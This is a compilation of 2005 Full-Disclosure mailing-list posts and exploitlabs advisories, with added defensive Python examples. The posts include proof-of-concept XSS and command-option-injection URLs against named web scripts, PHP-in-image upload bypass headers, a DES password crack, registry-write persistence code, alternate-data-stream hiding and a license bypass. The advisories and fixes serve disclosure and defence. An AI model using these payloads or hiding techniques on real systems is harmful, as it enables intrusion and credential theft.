Content Query has failed - SELECT opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp, opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion, prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime 1131846681 AND opinion.category = prod_type.id

sweet!
Re: [Full-disclosure] FAO Mark Murtagh from Websense
> First you missed the comment where I fixed my typo on the thread, second, I thought someone of your hacking experience, you would have been able to translate that message by yourself. In any case, I made

umm, no I doubt I missed anything except your contentless dribble. but I did notice the error of the web application... not only is it vulnerable to SQL injection, it is also vuln to XSS.

Possibly you would like to enroll in a Zone-H Hands on Hacking Seminar so you too might be able to understand them too, instead of filling this list with your paranoid, megalomaniac rants.

http://www.biosmagazine.co.uk/op.php?id=314;okbromgbrbn3td3v/b%20roxbr%20br
http://www.nccgroup.com/events/index.aspx

On 11/13/05, Morning Wood [EMAIL PROTECTED] wrote:

> Content Query has failed - SELECT opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp, opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion, prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime 1131846681 AND opinion.category = prod_type.id
>
> sweet!
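Both error pages quoted in these threads (the snappoll `poll_id='50150` error earlier, and the biosmagazine `opinion.id = 314\\` query above) show the same root cause: request parameters spliced into SQL text, so a stray quote or backslash becomes syntax and the database's own error is echoed to the client. The following is an added example, not code from either site; it uses an in-memory sqlite3 table constructed for the example, with the string-built query beside the parameterised one.

```python
"""String-built vs parameterised SQL, illustrated with sqlite3.

Added example, not code from snappoll.com or biosmagazine.co.uk.  The
'polls' table and its rows are constructed for this example.
"""
import sqlite3


def make_db():
    """Build a throwaway database with two constructed poll rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE polls (poll_id TEXT PRIMARY KEY, question TEXT)")
    con.executemany(
        "INSERT INTO polls VALUES (?, ?)",
        [("50150", "Return of the Phrack High Council?"),
         ("50151", "Best official patch?")],
    )
    return con


def lookup_unsafe(con, poll_id):
    """Query text built by concatenation, the pattern behind the error
    pages in the thread.  Returns the rows, or the database's error text
    as a string (which is what those sites leaked to the browser)."""
    sql = "SELECT * FROM polls WHERE poll_id='" + poll_id + "'"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Invalid SQL: %s -- %s" % (sql, exc)


def lookup_safe(con, poll_id):
    """Bound parameter: the input is always data, never SQL syntax, so a
    quote in it cannot change the statement or trigger a syntax error."""
    return con.execute("SELECT * FROM polls WHERE poll_id=?",
                       (poll_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("50150", "'50150", "' OR '1'='1"):
        print(repr(value), "unsafe:", lookup_unsafe(db, value))
        print(repr(value), "safe:  ", lookup_safe(db, value))
```

The third input in the usage loop shows why an echoed syntax error matters beyond information disclosure: the same concatenation that produces the error also lets a crafted value widen the `WHERE` clause, while the bound-parameter version simply finds no such poll.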
Re: [Full-disclosure] Question about ethics when discovering a security fault in system
Work with the company, coordinate an advisory release when they have the update avail. Chances are you will receive some form of a credit, thanking you for finding the flaw, and bringing it to the mfg's attention.

cheers
Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well).
By prepending image headers you can often fool php/IE. This technique has been used successfully to bypass php checking and renders the php upon access.

---
ÿØÿà JFIF <?php some phpcode ?>
---

or

---
GIF87aÔ <?php some phpcode ?>
---
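Two posts in this archive make the same point from opposite ends: the cmd.exe thread above (a PE named `malware.exe.txt` still runs because the loader reads the header, not the extension) and this one (a file that starts with a valid JPEG or GIF header passes an image check and still carries PHP). The defender's rule is the same in both cases: classify by content, and for uploads check for script tags even when the magic bytes look right. The following is an added example, not code from either post or from phpBB; the sample byte strings (including the stub MZ header, which is not an executable) are constructed for the example.

```python
"""Classify files by their content rather than their extension.

Added example, not code from the original posts.  The sample bytes at the
bottom are constructed for this example (a stub MZ header, not real code).
"""
import re

# Leading-byte signatures.  Order matters only for overlapping prefixes.
MAGIC = [
    (b"MZ", "pe"),                      # DOS/PE executable header
    (b"\xff\xd8\xff", "jpeg"),          # JPEG SOI marker (JFIF/Exif follow)
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
]

# PHP open tags.  The bare "<?" short tag is included deliberately, so
# "<?xml" is flagged too; tighten to "<?php" if that is too noisy.
PHP_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)

EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "gif": "gif", "png": "png",
               "exe": "pe"}


def sniff_type(data):
    """Return a type name from the leading bytes, ignoring the filename."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def extension_of(name):
    """Lower-cased final extension, or '' if there is none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def contains_php(data):
    """True if a PHP open tag appears anywhere in the content."""
    return PHP_TAG.search(data) is not None


def check_file(name, data, image_types=("jpeg", "gif", "png")):
    """Verdict: 'executable', 'image_with_php', 'mismatch' (content type
    disagrees with the extension) or 'ok'."""
    kind = sniff_type(data)
    if kind == "pe":
        return "executable"          # malware.exe.txt is still a PE
    if kind in image_types and contains_php(data):
        return "image_with_php"      # polyglot: real image header + PHP
    expected = EXT_TO_TYPE.get(extension_of(name))
    if expected is not None and expected != kind:
        return "mismatch"
    return "ok"


# Constructed samples (not real files)
STUB_PE = b"MZ\x90\x00" + b"\x00" * 60
JPEG_PHP = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"<?php some phpcode ?>"
GIF_PHP = b"GIF87a" + b"\x01\x00\x01\x00" + b"<?php some phpcode ?>"
PLAIN_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"

if __name__ == "__main__":
    for fname, blob in [("malware.exe.txt", STUB_PE), ("avatar.jpg", JPEG_PHP),
                        ("avatar.gif", GIF_PHP), ("avatar.gif", PLAIN_GIF),
                        ("avatar.jpg", PLAIN_GIF)]:
        print(fname, sniff_type(blob), check_file(fname, blob))
```

Content sniffing alone is not a complete upload defence: the uploads directory also needs to be served without script execution, and images are best re-encoded through an image library so that trailing payload bytes are discarded. The check above is the piece that the image-header trick specifically defeats when it is done by extension or magic bytes only.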
Re: [Full-disclosure] Call to participate: GNessUs security scanner
xscan from http://xfocus.org uses nessus plugins and the nasl library. I have used this tool for years, and the addition of nasl/nessus in 3.x is wonderful. If you haven't checked out this great tool, do so now.
http://xfocus.org/programs/200507/18.html

cheers,
MW
[Full-disclosure] Tellme 1.2
- EXPL-A-2005-015 exploitlabs.com Advisory 044 -
- TellMe -

AFFECTED PRODUCTS
=
TellMe v1.2 and earlier
http://kimihia.org.nz/projects/
http://kimihia.org.nz/projects/tellme/

OVERVIEW
Tellme - get all the lowdown details on an address
Tellme is used to discern what a computer is running, and also to help track down servers. It combines together into one place traceroute tools, head requests, server examination, and whois lookups.
TellMe is used widely in default Plesk installs as a bundled 3rd party add on.

DETAILS
===
1. XSS
TellMe does not properly filter malicious script content. XSS may be inserted in the IP or HOST parameter. The malicious script is then rendered and executed in the context of the user's browser.

2. command option access
Tellme allows access to command line options of the whois function via:

render_Open(WHOIS);
if ( $q_Host ) passthru(EscapeShellCmd("whois " . $q_This));

3. information disclosure
TellMe discloses path information in error output, echoing back the full path to the script.

POC
===
1. -- by script inclusion in the q_host parameter
http://[host]/tellme/index.php?q_Host=<iframe src=http://whatismyip.com></iframe>

2. -- by prepending --* options to the host entry
http://[host]/net/index.php?q_IP=&q_Host=--version+test.com&o_WhoIs=on
http://[host]/net/index.php?q_IP=&q_Host=--help+test.com&o_WhoIs=on

3. - by prepending -- to the Server and HEAD options
http://[host]/net/index.php?q_IP=&q_Host=--+test.com&o_Server=on&o_Head=on

Warning: fsockopen(): unable to connect to --help test.com:80 in /home/httpd/vhosts/[VHOSTUSER]/httpdocs/net/index.php on line 246

SOLUTION:
=
vendor contact: Sept 29, 2005 [EMAIL PROTECTED] ( returned ) http://kimihia.org.nz/about/feedback/
Vendor response: Oct 4, 2005
The author has released an updated version and a diff patch, available at:
Here is the new version: http://kimihia.org.nz/projects/tellme/files/tellme-1.3_php3.txt
Here is a diff: http://kimihia.org.nz/projects/tellme/files/tellme-1.2-1.3.diff
Here is the new README: http://kimihia.org.nz/projects/tellme/files/tellme.txt

Credits
===
This vulnerability was discovered and researched by Donnie Werner of exploitlabs
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
orig: http://exploitlabs.com/files/advisories/EXPL-A-2005-015-tellme.txt
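The three findings in the advisory share one cause: the host parameter is used without validation, so it can carry script (finding 1), whois options (finding 2, which `EscapeShellCmd` does not stop because a leading `--` is not shell metacharacter), and a bad value that makes PHP print its install path (finding 3). The following is an added example, not TellMe's code (which is PHP) nor the vendor's 1.3 fix; it shows the host validation, argument construction and output handling a hardened version would need. Function names are hypothetical, and it assumes a `whois` binary that honours `--` as the end of options (true of getopt-based builds).

```python
"""Hardening the three TellMe findings: validate the host, never let it be
parsed as an option, escape it on output, and keep install paths out of
error text.  Added example; names are hypothetical, not TellMe's.
"""
import html
import ipaddress
import re

# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen.
# A value such as "--help" or "-x.example.com" fails on its first label.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_host(value):
    """True for an IPv4/IPv6 literal or a syntactically valid hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def whois_argv(host):
    """Argument vector for subprocess.run(argv) with no shell involved.
    Returns None for an invalid host.  The '--' ends option parsing, so
    even a value that slipped past validation cannot act as a flag."""
    if not is_valid_host(host):
        return None
    return ["whois", "--", host]


def render_host(host):
    """HTML-escape the q_Host value before echoing it into the page."""
    return html.escape(host, quote=True)


def public_error(message, install_prefix):
    """Error text safe to show users: replace the install path that the
    PHP warning in the advisory leaked.  install_prefix is whatever the
    deployment's document root is (a hypothetical value in the test)."""
    return message.replace(install_prefix, "[app]")


if __name__ == "__main__":
    for value in ("test.com", "--version test.com", "--help", "8.8.8.8",
                  "<iframe src=x>"):
        print(repr(value), "valid:", is_valid_host(value),
              "argv:", whois_argv(value), "html:", render_host(value))
```

Validation rejects the option-looking values outright; the `--` separator and the list-form argv are defence in depth for the case where the whois front end is reused with a looser validator.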
Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3
> Can you give me an example of a trojan, worm, or another program which has added the last USB device installed in the Windows Registry,

yes, see below

> or how about a program, worm, trojan -

some ASM code... ( edited )

any_key1     db "SYSTEM\CurrentControlSet\AnyKeyIWant", 0
another_key2 db "SYSTEM\CurrentControlSet\AnotherKeyIWant", 0

invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL
invoke wsprintf, addr senddata, addr some_value3, addr port
invoke wsprintf, addr recvdata, addr another_value2, addr port
invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata, eax
invoke RegCloseKey, hRegkey

( repeat for another_key2 )

easily done in .c too

or

c:\>regedt32 -s somebad.reg ( will silently install ANY key you want )

> which caused something to be added to the last typed URL?

VNC ( or aforementioned key writes )

how do you think malware writes startup keys? I am confused by your statement... once a system has been compromised, ANYTHING can be written to the registry ( especially if the attacker has SYSTEM privs )

my2bits,
M.W
Re: [Full-disclosure] CORE-Impact license bypass
been known since at least v3.2
are you using a 3.x or a 4.x series?
i believe the 4.x requires an auth from core before use

- Original Message -
From: c0ntex [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 26, 2005 3:30 AM
Subject: [Full-disclosure] CORE-Impact license bypass

> I seem to have stumbled over a bug in Core Impact licensing mechanisms that will allow anyone to continually use the Core Impact product even after the license has expired. This is not a security issue but it is, I feel, either an oversight or a feature which can be abused to utilise the Core Impact product for longer than designed / desired.
>
> In my business funded Core Impact install on this machine, the license expired at the end of last month and the usual Your license has expired pop-up appears, however it is easy to re-enable Core to a working install by merely changing the system date on the PC to say a month before the product was due to expire. Oops ;)
>
> I guess Core is using a very simplistic license mechanism.
>
> Emailed CORE two times, 1 week ago, no reply.
>
> --
> regards
> c0ntex
Re: [Full-disclosure] RE: perldiver
the proposed fix is the vendor's suggestion, not mine.
Feel free to contact http://scriptsolutions.com/ and tell him yourself
kthnx.

- Original Message -
From: [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, September 21, 2005 11:58 AM
Subject: [Full-disclosure] RE: perldiver

> I believe mrwood's proposed fix isn't going to help. As it just strips the first character if it's \w or :
>
> perhaps when he suggested
> $module =~ s/^([A-Za-z0-9]|:)//g;
> he meant
> $module =~ s/[^A-Za-z0-9:]//g;
>
> Thank you morning_wood for helping promote secure web application development. Keep up the good work.
[Full-disclosure] perldiver
- EXPL-A-2005-014 exploitlabs.com Advisory 043 -
- perldiver -

AFFECTED PRODUCTS
=
Perldiver v1.x and 2.x
http://scriptsolutions.com/

OVERVIEW
Perl Diver digs into your server's perl installation and gives you the information you need in a quick and easy to find manner.

DETAILS
===
1. XSS
Perldiver does not properly filter malicious script content. XSS may be inserted in the module parameter ( v2.x ) or as a GET request in the main script ( v1.x ). The malicious script is then rendered and is executed in the context of the user's browser.

POC
===
1.x --
http://[host]/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain);</SCRIPT>

2.x --
http://[host]/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

bonus vendor site vuln:
http://www.scriptsolutions.com/programs/free/perldiver/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

SOLUTION:
=
vendor contact: Sept 14, 2005
http://www.scriptsolutions.com/support/postlist.pl?Cat=&Board=DDBugs

response Sept 15, 2005
If you are a current PerlDiver user, you can either download the updated version, or insert the following line after

my $module = param( 'module' );

in the module_detail subroutine:

$module =~ s/^([A-Za-z0-9]|:)//g;

updated version:
http://www.scriptsolutions.com/support/showflat.pl?Board=DLPerlDiver&Number=446
http://www.scriptsolutions.com/support/files/4-446-perldiver.zip

Credits
===
This vulnerability was discovered and researched by Donnie Werner of exploitlabs
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
orig advisory: http://exploitlabs.com/files/advisories/EXPL-A-2005-014-perldiver.txt
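The regex in the vendor's response is anchored with `^`, so even with `/g` it removes at most one character, and only when that character is already harmless; the reply in the thread above proposes the negated class `[^A-Za-z0-9:]` instead. The following is an added example, not the vendor's or the advisory's code: it reproduces both substitutions with Python's `re` module (which treats these two patterns the same way Perl does) on the advisory's own payload, and adds a stricter whole-value check for Perl package names as a third option.

```python
"""Vendor's one-character strip vs a character whitelist, for the
perldiver module parameter.  Added example; the two substitutions are the
ones quoted in the thread, rewritten with Python's re module.
"""
import re

# Payload from the advisory's 2.x PoC (module parameter, URL-decoded).
SAMPLE = "<script>document.write(document.domain)</script>"


def vendor_fix(module):
    """s/^([A-Za-z0-9]|:)//g  -- anchored at ^, so it removes at most the
    first character, and only if that character was safe anyway."""
    return re.sub(r"^([A-Za-z0-9]|:)", "", module)


def whitelist_fix(module):
    """s/[^A-Za-z0-9:]//g  -- the thread's suggestion: drop every byte
    outside the module-name alphabet, wherever it appears."""
    return re.sub(r"[^A-Za-z0-9:]", "", module)


def is_module_name(module):
    """Stricter alternative: accept only a Perl package name such as
    Data::Dumper and reject anything else outright instead of stripping."""
    pattern = r"[A-Za-z_][A-Za-z0-9_]*(::[A-Za-z_][A-Za-z0-9_]*)*"
    return re.fullmatch(pattern, module) is not None


if __name__ == "__main__":
    for value in (SAMPLE, "Data::Dumper", "../../etc/passwd"):
        print(repr(value))
        print("  vendor   :", repr(vendor_fix(value)))
        print("  whitelist:", repr(whitelist_fix(value)))
        print("  accepted :", is_module_name(value))
```

The vendor pattern leaves the script payload untouched while chopping the first letter off a legitimate `Data::Dumper`; the whitelist removes every tag character; the full-match check is the one to prefer when the parameter has a well-defined grammar, since rejecting is safer than sanitising.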
[Full-disclosure] mimicboard2
- EXPL-A-2005-013 exploitlabs.com Advisory 042 -
- mimicboard2 -

AFFECTED PRODUCTS
mimicboard2 #086 and lower
http://www.chitta.com/nobu/download/#mimic2

OVERVIEW
Mimic2 is a html open forum type of blog, tailored in particular to the Japanese market ( and is very popular )

DETAILS
1. XSS
Mimic2 does not properly filter malicious script content. XSS may be inserted in the name, title and comment sections, and is persistent in nature. The malicious script is then rendered upon visitation and is executed in the context of the user's browser.

2. information disclosure
http://[host]/mimic2.dat is viewable via the webroot and has no protection by default. mimic2 stores data in this file consisting of:
a. administrator passwords
b. user information including referer ip address, message content and password if one was used in the post.

POC
1. input malicious iframe script into the comment, title and name sections.
http://[host]/mimic2.cgi
eg: <iframe src=[attacker url]></iframe>

2. the password(s) are easily crackable as evidenced by:

mimic2.dat
echo "mimic board2:Fdtr67zbisXVA:13" > mimic2.txt
john -w:password.lst mimic2.txt
Loaded 1 password (Standard DES [24/32 4K])
password         (mimic board2)

SOLUTION:
vendor contact: [EMAIL PROTECTED] Aug 24, 2005
no response as of Sept 8, 2005

Credits
This vulnerability was discovered and researched by Donnie Werner of exploitlabs
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
web: http://exploitlabs.com
web: http://zone-h.org
Re: [Full-disclosure] Shell32.dll.124.config
sounds like an ADS ( alternate data stream )
http://www.sysinternals.com/Utilities/Streams.html

I wrote this awhile back as notes on a project... this is a simple example...

Create an executable ADS:
-
c:\>type c:\fullpath\exename.exe > somefile.ext:exename.exe
( or somefile.exe:someothername.exe )

Execute an ADS:
---
c:\>start c:\pathto\somefile.ext
( starts the example above running exename.exe behind the visible somefile.ext )

c:\>type c:\start.bat > c:\windows\explorer.exe:start.bat
( this creates a file named start.bat that executes explorer.exe )

c:\>start
( will now execute the full path to c:\to\somefile.ext )

hope this helps.

- Original Message -
From: y0himba [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 05, 2005 4:33 PM
Subject: [Full-disclosure] Shell32.dll.124.config

> Hi, Yes I am a noob. I have a question though. Google searches and a few other things can tell me nothing about shell32.dll.124.config. I am on WindowsXP SP2, and keep seeing this file show up in antivirus scans, but cannot find it anywhere on the system! I think it is dynamically created by something, but after sitting and watching Filemon 7.02 for 20 minutes or so, I give up.
>
> Has anyone heard of this file? Antivir, Bitdefender, AVG and Clam all show it on the system, have scanned it, but have found nothing. I have never seen this file before...
>
> Thanks in advance for your help!